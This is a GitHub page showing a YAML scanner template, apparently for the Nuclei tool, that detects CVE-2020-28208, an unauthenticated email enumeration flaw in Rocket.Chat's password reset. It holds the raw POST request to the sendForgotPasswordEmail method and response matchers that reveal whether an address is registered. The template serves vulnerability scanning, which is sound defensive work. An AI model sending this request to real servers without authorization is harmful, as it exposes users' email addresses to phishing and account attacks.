-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2020-28208.yaml
36 lines (32 loc) · 1.01 KB
/
CVE-2020-28208.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
id: CVE-2020-28208
info:
name: RocketChat Unauthenticated Email enumeration
author: pdteam
severity: medium
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
reference: https://trovent.io/security-advisory-2010-01
tags: cve,cve2020,rocketchat
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-28208
cwe-id: CWE-203
requests:
- raw:
- |
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"[email protected]\"],\"id\":\"3\"}"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"result\":false'
- '"success":true'
part: body
condition: and